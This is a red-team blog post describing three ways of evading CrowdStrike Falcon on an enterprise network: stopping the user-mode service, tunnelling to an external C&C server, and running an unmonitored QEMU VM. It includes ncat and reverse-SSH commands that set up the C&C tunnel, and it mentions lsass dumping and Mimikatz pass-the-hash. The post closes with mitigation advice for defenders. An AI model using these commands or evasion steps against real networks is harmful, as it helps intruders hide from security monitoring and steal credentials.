EDR solutions and specifically CrowdStrike Falcon are giving us a hard time recently. It seemed that no matter how covert we tried to be, a well-trained blue team was able to utilize these type of solutions to pick up on our activity relatively fast. That’s why when we had an opportunity to travel to India and sit in the same room with the SOC team of one of the biggest companies in the world, a team that built their detection capabilities around CrowdStrike, we couldn't resist the urge to test out some of our ideas on how these tools can be bypassed.
We ended up with 3 new techniques for CrowdStrike bypass that force blue-teams (and CrowdStrike) to re-think some of their current detection and mitigation tactics.
What is CrowdStrike anyway?
CrowdStrike looks at the OS of a machine, logs pretty much everything that happens on it (processes, memory, etc.), and alerts on deviations and anomalies from standard behavior (I’m sure it does many more things, but for our purposes this description will suffice). In cases where such anomalies are detected, a SOC analyst can use CrowdStrike to login to the affected machine, research it, collect artifacts, and when needed, stop processes and block the attack. To give a quick example, how often does it really happen that a legitimate web-server process starts executing OS commands through PowerShell? The answer is not often, and this simple anomaly would many times mean web-shell (i.e. probably an attack).
This straightforward approach can prove to be quite effective. In the case of the SOC team we were dealing with, their analysts managed to build upon anomaly mapping to the point where they could detect pretty much any command-line usage that was not absolutely trivial (and we’re talking about an organization with hundreds of thousands of machines to monitor).
For an attacker that tries to stay covert - this poses a significant problem. Almost every PowerShell script we execute (no matter how custom and seemingly benign) would trigger an alert, not to mention anything as aggressive as BloodHound, PowerView, and other automated tools.
#1 - Throwing the first punch - shutting down the service
A previously discussed approach for disabling CrowdStrike was to uninstall the product on the compromised machine. In our case, though, the SOC was in the midst of deploying a protection against this approach by requiring a special token to uninstall. However, what we found was that given local system permissions, we were able to stop the user-mode service:
So What Just Happened?
user-mode service does not stop CrowdStrike from monitoring and collecting logs (this happens at the Kernel level). However, it did lead to a significant achievement - after we shut down this service, the blue team’s analysts were no longer able to use CrowdStrike to take control of the compromised OS. In other words, because CrowdStrike access was the blue team’s only access, we essentially blocked them from accessing the machine.
Let’s look at a simple scenario to put this in perspective:
Previously, when we took an lsass dump from a server, an alert would be triggered and within minutes (before we even managed to exfiltrate the dump) the SOC team would connect to the machine (via CrowdStrike) and grab the same dump we had just taken. So, in addition to detecting the attack the SOC was also able to learn which credentials were compromised, follow the attacker’s next steps, and reset all the compromised accounts.
After shutting down the service, however, the blue team was no longer able to connect to the machine or collect the attacker’s artifacts (such as the lsass dump). So while the attack was detected, the ‘thread’ (in terms of which accounts were compromised) was lost.
The SOC team contacted CrowdStrike regarding this technique, and I'm sure it will be solved quickly, so let’s continue to more sophisticated stuff.
#2 Tunnel network to a remote C&C
The power of CrowdStrike relies on its ability to monitor the processes running on the OS.
So what will happen if we run the malicious process on a machine that is not monitored and just tunnel the network to the organization's LAN?
In theory, if we can achieve this, it will be quite hard to track us - all the scripts, binaries and processes ( in other words all the things CrowdStrike looks at) will be executed on the attacker’s machine. The only clues for the attack will happen in the organization's network layer, which is much more difficult to monitor.
Time to put the theory to the test.
Utilizing reverse dynamic port forwarding, SOCKS5 proxy and OpenSSH for Windows allowed us to build a tunnel that does exactly that, in 5 minutes!
Ok, that’s a lie, it took us ages to configure all of these things to play together (feel free to skip ahead if you want to avoid a headache):
OpenSSH doesn't like Windows.
OpenSSH is the only SSH client we found that natively provides reverse dynamic port forwarding over SOCKS.
OpenSSH really doesn't like windows.
We had to tunnel outgoing traffic via the organization’s HTTP proxy. OpenSSH doesn't natively support proxying without NCAT. The seemingly simple solution using ‘proxycommand’ (with NCAT for Windows) failed. (We got a ‘/usr/bin’ missing error, on a Win machine. Debugging was loads of fun).
Finally, we did manage to build the most overly complicated (probably unnecessarily complicated) tunnel using two NCAT connections piped together. So our complete set-up was:
OpenSSH server for Windows running on the C&C server.
Proxy tunnel set up between the client and the C&C, via 2 NCAT connections:
ncat.exe -lvp 1234 -e "ncat.exe C&C_HOST:C&C_PORT --proxy PROXY_HOST:PROXY_PORT"
OpenSSH client for Windows running on the client machine, with Reverse Dynamic Port forward set up through our tunnel:
OpenSSH -R 4444 user@localhost -p 1234
A Windows tool to tunnel all outgoing network from the C&C server through the SOCKS proxy on port 4444 (we used Proxifier).
Ugly as hell, but it worked. Using this tunnel we were able to scan the internal network while running a script on our Amazon AWS machine (we used a very basic PowerShell port scanner as a POC):
So Did it Work?
Short answer - Yes! We managed to scan the network and actively exploit it, while completely staying under CrowdStrike radar. To complete the POC we ran Pass-The-Hash using Mimikatz that was running on our server and attacking the organization’s AD.
CrowdStrike saw nothing.
Even when we told the blue team exactly what we had done and how, they were unable to find traces of the attack with CrowdStrike.
We did however encounter two issues:
DNS does not like TCP tunnels. So tools that rely on DNS (for example BloodHound) will not work out-of-box.
While we successfully bypassed CrowdStrike, our tunnel did raise an alert in the HTTP proxy, as it identified tunneling activity. This can perhaps be solved with a better tunnel solution instead of our double NCAT connection, but it still poses another issue to deal with.
So, we now had a half-complete bypass solution, but still not everything we wanted. Time for the third and final punch - time to go for the kill.
#3 Running our own VM within the enterprise LAN [KO]
This time, instead of running our scripts on an unmonitored machine outside the LAN using a tunnel, we simply created an unmonitored machine inside the LAN and skipped the tunnel altogether!
It turned out to be easier than expected. Using Qemu we were able to run an emulated VM inside the corporate network without installing anything and without requiring any elevated permissions (see here on how to get this going). As Qemu’s emulator mode does everything by software, we had to go for a GUI-less OS and keep everything very light (running a GUI might be very, very slow without hardware support), so we chose Tinycore ‘core’ distribution as our OS.
There are no other words - It worked beautifully:
Using our new deployed VM, we were able to run arbitrary scripts and scans against the network (DNS included) and stay completely invisible to CrowdStrike and the blue team. It was truly a moment of joy :-)
Initial thoughts of mitigation (for both blue teams and CrowdStrike)
This research was conducted using a real, live production network of one of the biggest enterprises in the world, and I dare say probably one of the bigger CrowdStrike clients out there, and I think it’s safe to say that the techniques outlined in this article would work against most (if not all) CrowdStrike-based defenses.
Some of these issues are easier to solve. For example, denying local users (even with system permissions) from stopping CrowdStrike services can probably be achieved with the correct configuration, and I believe that should be the default CrowdStrike configuration (following the ‘Secure By Default’ principal).
Network-level monitoring though might be trickier, whilst evidently necessary, and I’m not sure that CrowdStrike can provide it at the moment. While I believe CrowdStrike Falcon is a good, maybe even excellent solution, it seems it cannot be the only tool in the detection toolbox and other products are necessary to have a comprehensive view of the corporate environment.
Final thoughts
The fun part of the whole ‘Red vs Blue’ concept is the chase - the detection gets better, so the attacker has to come up with new techniques and vise-versa. For a while there, it started feeling like a blue team armed with CrowdStrike seems to have the edge. However, Using these new techniques, I regained my faith in the power of advanced attackers to remain silent. The battle continues!
More to read in Komodo Consulting Blog
Know More:
How did you get the VM to see the network? I have not been able to scan my domain. If possible could you list the steps?